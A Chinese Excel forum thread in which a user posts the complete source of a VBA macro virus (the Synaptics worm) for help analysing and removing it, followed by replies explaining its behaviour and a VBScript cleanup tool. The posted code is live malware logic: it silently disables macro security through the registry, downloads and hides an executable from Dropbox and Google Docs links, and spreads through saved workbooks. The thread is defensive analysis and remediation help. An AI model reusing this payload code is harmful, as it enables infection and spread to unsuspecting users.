ExcelHome技术论坛

 找回密码
 免费注册

QQ登录

只需一步,快速开始

快捷登录

搜索
EH技术汇-专业的职场技能充电站 妙哉!函数段子手趣味讲函数 Excel服务器-会Excel,做管理系统 效率神器,一键搞定繁琐工作
HR薪酬管理数字化实战 Excel 2021函数公式学习大典 Excel数据透视表实战秘技 打造核心竞争力的职场宝典
让更多数据处理,一键完成 数据工作者的案头书 免费直播课集锦 ExcelHome出品 - VBA代码宝免费下载
用ChatGPT与VBA一键搞定Excel WPS表格从入门到精通 Excel VBA经典代码实践指南
查看: 6148|回复: 14

[求助] 电脑感染的宏病毒的代码,大家帮分析下,谢谢

[复制链接]

TA的精华主题

TA的得分主题

发表于 2020-4-1 16:27 | 显示全部楼层 |阅读模式
[广告] VBA代码宝 - VBA编程加强工具 · VBA代码随查随用  · 内置多项VBA编程加强工具       ★ 免费下载 ★      ★使用手册
最近我的电脑应该是中了宏病毒,现象是:朋友微信发xls文件给我,我一下载到桌面自动变成xlsm格式。我自己在桌面新建一个xls文件,马上变成xlsm格式,然后想进去看vba代码,提示要输入密码,无法查看代码。保存工作薄时,在单元格还要自动输入一个c ,我做了的表格发给同事,同事都打不开了,严重影响我的正常工作。我找方法破解了VBA密码,查看到了病毒代码,我对VBA代码还不是很熟,在学习阶段,特此把病毒代码发出来,请各高手帮我看看,这病毒宏代码都干了些什么事情,我该如何彻底清除,以及以后如何防范,谢谢老师!

病毒代码如下:
Dim SheetsChanged As Boolean
Dim SheetCount As Integer

Private Sub Workbook_Open()
  Dim i As Integer
  For i = 1 To ActiveWorkbook.Sheets.Count
    ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
  Next i
  
  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
  
  Application.DisplayAlerts = False
  SheetCount = Worksheets.Count
  
  Call MPS
  
  ActiveWorkbook.Sheets(1).Select
  SheetsChanged = False
End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)
  If Not SheetsChanged Then
    ActiveWorkbook.Saved = True
  End If
End Sub

Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
  SheetsChanged = True
End Sub

Private Sub Workbook_NewSheet(ByVal Sh As Object)
  SheetsChanged = True
End Sub

Private Sub Workbook_SheetActivate(ByVal Sh As Object)
  If ActiveWorkbook.Sheets.Count <> SheetCount Then
    SheetsChanged = True
    SheetCount = ActiveWorkbook.Sheets.Count
  End If
End Sub

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
  Dim i As Integer
  Dim AIndex As Integer
  Dim FName

  AIndex = ActiveWorkbook.ActiveSheet.Index

  If SaveAsUI = False Then
    Cancel = True
    Application.EnableEvents = False
    Application.ScreenUpdating = False
   
    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i
    ActiveWorkbook.Save
      
    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False
   
    Application.ScreenUpdating = True
    Application.EnableEvents = True
  Else
    Cancel = True
    Application.EnableEvents = False
    Application.ScreenUpdating = False
   
    For i = 1 To ActiveWorkbook.Sheets.Count - 1
      ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
    Next i
   
    FName = Application.GetSaveAsFilename(fileFilter:="Excel 莂lma Kitab?(*.xlsm), *.xlsm")
    If FName <> False Then
      ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
      SaveAsInj ActiveWorkbook.Path
    End If
   
    For i = 1 To ActiveWorkbook.Sheets.Count
      ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
    Next i
    ActiveWorkbook.Sheets(AIndex).Select
    SheetsChanged = False
        
    Application.ScreenUpdating = True
    Application.EnableEvents = True
  End If
End Sub

Sub SaveAsInj(DIR As String)
  Dim FSO As Object
  Dim FN As String
  
  Set FSO = CreateObject("scripting.filesystemobject")
  FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
  
  If FSO.FileExists(FN) Then
    If Not FSO.FileExists(DIR & "\~$cache1") Then
      FileCopy FN, DIR & "\~$cache1"
    End If
    SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
  End If
End Sub

Function RegKeyRead(i_RegKey As String) As String
  Dim myWS As Object

  On Error Resume Next
  Set myWS = CreateObject("WScript.Shell")
  RegKeyRead = myWS.RegRead(i_RegKey)
End Function

Function RegKeyExists(i_RegKey As String) As Boolean
Dim myWS As Object

  On Error GoTo ErrorHandler
  Set myWS = CreateObject("WScript.Shell")
  myWS.RegRead i_RegKey
  RegKeyExists = True
  Exit Function
  
ErrorHandler:
  RegKeyExists = False
End Function

Sub RegKeySave(i_RegKey As String, _
               i_Value As String, _
      Optional i_Type As String = "REG_SZ")
Dim myWS As Object

  Set myWS = CreateObject("WScript.Shell")
  myWS.RegWrite i_RegKey, i_Value, i_Type
End Sub

Sub MPS()
  Dim FSO As Object
  Dim FP(1 To 3), TMP, URL(1 To 3) As String
  
  Set FSO = CreateObject("scripting.filesystemobject")
  FP(1) = ActiveWorkbook.Path & "\~$cache1"
  FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

  URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
  URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
  URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
  TMP = Environ("Temp") & "\~$cache1.exe"
  
  If FSO.FileExists(FP(1)) Then
    If Not FSO.FileExists(TMP) Then
      FileCopy FP(1), TMP
    End If
    Shell TMP, vbHide
  ElseIf FSO.FileExists(FP(2)) Then
    If Not FSO.FileExists(TMP) Then
      FileCopy FP(2), TMP
    End If
    Shell TMP, vbHide
  Else
    If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
      Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
    ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
      Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
    ElseIf Not FSO.FileExists(TMP) Then
      If FDW((URL(1)), (TMP)) Then
      ElseIf FDW((URL(2)), (TMP)) Then
      ElseIf FDW((URL(3)), (TMP)) Then
      End If
      If FSO.FileExists(TMP) Then
        Shell TMP, vbHide
      End If
    Else
      Shell TMP, vbHide
    End If
   
  End If
  
End Sub

Function FDW(MYU, NMA As String) As Boolean
  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
  If WinHttpReq Is Nothing Then
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
  End If

  WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
  WinHttpReq.Option(6) = AllowRedirects
  WinHttpReq.Open "GET", MYU, False
  WinHttpReq.Send
  
  If (WinHttpReq.Status = 200) Then
    If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
      FDW = True
      Set oStream = CreateObject("ADODB.Stream")
      oStream.Open
      oStream.Type = 1
      oStream.Write WinHttpReq.ResponseBody
      oStream.SaveToFile (NMA)
      oStream.Close
    Else
       FDW = False
    End If
  Else
    FDW = False
  End If
End Function




TA的精华主题

TA的得分主题

发表于 2020-4-17 13:50 | 显示全部楼层
你好,请教一下要怎么解决?我也是遇到这段代码,我解码删除掉ThisWorkbook里面这段代码后就好了,但是隔天开机excel又出现这种情况而且这段代码又出现了

TA的精华主题

TA的得分主题

发表于 2020-8-9 21:00 | 显示全部楼层

TA的精华主题

TA的得分主题

发表于 2020-8-10 09:27 来自手机 | 显示全部楼层
从第一个过程看,它是把一些信息写入了注册表。如果你仅仅是清除了工作簿中的代码而没有清理注册表信息,那它应该会把代码回写到工作簿中从而死灰复燃。

TA的精华主题

TA的得分主题

发表于 2020-8-10 10:27 | 显示全部楼层
[广告] Excel易用宝 - 提升Excel的操作效率 · Excel / WPS表格插件       ★免费下载 ★       ★ 使用帮助
看不太懂,下载了可执行文件,修改了注册表,把文件都改成打开启用的 XML 工作簿宏。你可以查查电脑上面的Synaptics.exe这个文件。也不测试,怕中毒

评分

1

查看全部评分

TA的精华主题

TA的得分主题

发表于 2020-11-1 15:10 | 显示全部楼层
本帖最后由 晴晴晴晴晴 于 2020-11-1 15:17 编辑

正巧 我也中了 莫名其妙的


会在 C:\ProgramData\Synaptics 置入一个木马 具体文件被sd删了...路径不太清楚



该病毒通过感染指定位置的32位的“.exe”后缀文件与“.xlsx”后缀文件,使其恶意代码可以通过文件共享大量传播但不会导致系统明显卡顿。
如下三个指定的感染位置:
%USERPROFILE%\Desktop
%USERPROFILE%\Documents
%USERPROFILE%\Downloads


目前看应该就是 http://hackernews.cc/archives/29353

TA的精华主题

TA的得分主题

发表于 2020-11-1 20:25 | 显示全部楼层
[广告] VBA代码宝 - VBA编程加强工具 · VBA代码随查随用  · 内置多项VBA编程加强工具       ★ 免费下载 ★      ★使用手册
看不懂,我来凑个热闹。。。

TA的精华主题

TA的得分主题

发表于 2020-11-2 09:32 | 显示全部楼层
[广告] VBA代码宝 - VBA编程加强工具 · VBA代码随查随用  · 内置多项VBA编程加强工具       ★ 免费下载 ★      ★使用手册
  • 看起来病毒会拦截保存文件的操作,诱导用户保存成xlsm类型
  • 会在3个指定位置生成一个可执行文件
  • 修改注册表,应该是设置vba安全等级达到启用宏不提示的目的
  • 会在工作簿所在的目录下生成一个可执行文件,并隐藏

写了一个vbs来恢复被修改的注册表与删除三个固定位置的可执行文件,但硬盘上其他位置的~$cache1文件并没有删除,vbs代码如下,也可以直接下载附件(可能会被杀毒软件干掉)

建议处理方式:
  • 打开任务管理器,如果存在Synaptics.exe、~$cache1.exe进程,就先结束这些进程
  • 安装everything
  • 用everything搜索硬盘上所有的~$cache1 、 Synaptics.exe 并删除
  • 断开网络
  • 执行我提供的vbs修改注册表,也可以手动设置宏的安全性等级
  • 打开被感染的工作簿,不要启用宏,如果存在病毒代码,手动删除之。

可能你要问,怎么知道哪些文件被感染了呢?
ANS:活用everything,搜索*.xlsm,然后按修改时间排序,找到最近修改过的文件,大概率就是了。



  1. rem 恢复注册表
  2. on error resume next
  3. dim officever,regobj,regv,reg1,reg2,fso
  4. officever=getofficever
  5. Set regobj=WScript.CreateObject("WScript.Shell")
  6. reg1="HKCU\Software\Microsoft\Office" & officever & "\Excel\Security\VBAWarnings"
  7. reg2="HKCU\Software\Microsoft\Office" & officever & "\Word\Security\VBAWarnings"
  8. regv=regobj.regread(reg1)
  9. if err.number<>0 then
  10.         msgbox "不存在" & reg1
  11.         err.clear
  12. else
  13.         regobj.regwrite reg1,0,"REG_DWORD"
  14. end if
  15. regv=regobj.regread(reg2)
  16. if err.number<>0 then
  17.         msgbox "不存在" & reg2
  18.         err.clear
  19. else
  20.         regobj.regwrite reg2,0,"REG_DWORD"
  21. end if
  22. set regobj=nothing


  23. rem 删除病毒创建的文件
  24. dim f1,f2,f3
  25. set fso=createobject("scripting.filesystemobject")
  26. set ws = createobject("wscript.shell")

  27. f1=ws.expandenvironmentstrings("%ALLUSERSPROFILE%") & "\Synaptics\Synaptics.exe"
  28. f2=ws.expandenvironmentstrings("%WINDIR%") & "\System32\Synaptics\Synaptics.exe"
  29. f3=ws.expandenvironmentstrings("%Temp%") & "\~$cache1.exe"
  30. if fso.fileexists(f1) then
  31.         fso.deletefile(f1)
  32.         msgbox f1 & "已删除"
  33. else
  34.         msgbox f1 & " 不存在"
  35. end if
  36. if fso.fileexists(f2) then
  37.         fso.deletefile(f2)
  38.         msgbox f2 & "已删除"
  39. else
  40.         msgbox f2 & " 不存在"
  41. end if
  42. if fso.fileexists(f3) then
  43.         fso.deletefile(f3)
  44.         msgbox f3 & "已删除"
  45. else
  46.         msgbox f3 & " 不存在"
  47. end if
  48. set ws = nothing
  49. set fso=nothing


  50. rem 获取office版本
  51. function getOfficeVer()
  52.         on error resume next
  53.         set vWD=createobject("word.application")
  54.         getOfficeVer=vWD.version
  55.         vWD.quit false
  56. end function
复制代码



killV.rar

743 Bytes, 下载次数: 50

评分

3

查看全部评分

TA的精华主题

TA的得分主题

发表于 2020-12-1 19:07 | 显示全部楼层
[广告] VBA代码宝 - VBA编程加强工具 · VBA代码随查随用  · 内置多项VBA编程加强工具       ★ 免费下载 ★      ★使用手册
有用的帖,留下到访足迹 !

TA的精华主题

TA的得分主题

发表于 2020-12-1 23:25 | 显示全部楼层
您需要登录后才可以回帖 登录 | 免费注册

本版积分规则

手机版|关于我们|联系我们|ExcelHome

GMT+8, 2024-11-20 12:26 , Processed in 0.038250 second(s), 11 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 1999-2023 Wooffice Inc.

沪公网安备 31011702000001号 沪ICP备11019229号-2

本论坛言论纯属发表者个人意见,任何违反国家相关法律的言论,本站将协助国家相关部门追究发言者责任!     本站特聘法律顾问:李志群律师

快速回复 返回顶部 返回列表